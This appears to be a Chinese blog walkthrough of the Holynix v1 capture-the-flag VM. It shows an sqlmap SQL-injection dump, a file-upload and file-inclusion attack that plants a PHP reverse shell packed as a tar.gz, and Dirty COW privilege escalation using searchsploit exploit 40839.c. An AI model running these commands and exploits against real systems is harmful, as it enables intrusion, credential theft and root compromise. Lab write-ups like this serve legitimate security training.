holynix:v1

1. 主机发现

2. 端口扫描

3. 目录扫描

4. 漏洞探测

  1. 访问首页

  1. 发现登录页面

  1. 登录框存在SQL注入

  1. 找到用户名和密码,登录
python3 sqlmap.py -r 1.txt --batch --random-agent -D creds -T accounts --dump

  1. 发现有文件上传功能点,尝试上传文件,发现不允许上传,估计是用户权限不够

  1. 用高权限用户etenenbaum登录后上传文件,成功上传,文件上传后去的是transfer.php文件

  1. 开启这个选项,就会自动解压压缩包文件,并保存在用户家目录

  1. http://192.168.236.133/~etenenbaum/

  1. 发现文件包含漏洞

  1. 更改路径,成功包含

  1. 通过文件包含,查看transfer.php文件

  1. 压缩包转换的背后逻辑是用tar xzf解压,那么我们可以用tar czf打包文件,再进行上传
locate php-reverse
cp /usr/share/laudanum/php/php-reverse-shell.php .

修改此文件

tar czf shell.tar.gz php-reverse-shell.php 

  1. 可以发现自动解压

  1. 监听1234端口,访问php文件,成功反弹shell

5. 提权

  1. 查看内核版本信息,发现是2.6.24版本,可尝试脏牛提权
uname -a

  1. 查找脏牛提权
searchsploit 'Dirty COW'

  1. 将文件拷贝到当前目录
searchsploit -m 40839.c

  1. 开启web服务,在shell终端下载当前文件

  1. 编译
gcc -pthread 40839.c -o 40839 -lcrypt

  1. 运行编译后的文件,输入密码

  1. 切换新用户firefart,发现失败

  1. 使用Python提高交互性,然后切换用户,脏牛提权成功
 python -c "import pty;pty.spawn('/bin/bash')"

  1. 记得将备份文件移回去
mv /tmp/passwd.bak /etc/passwd

  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值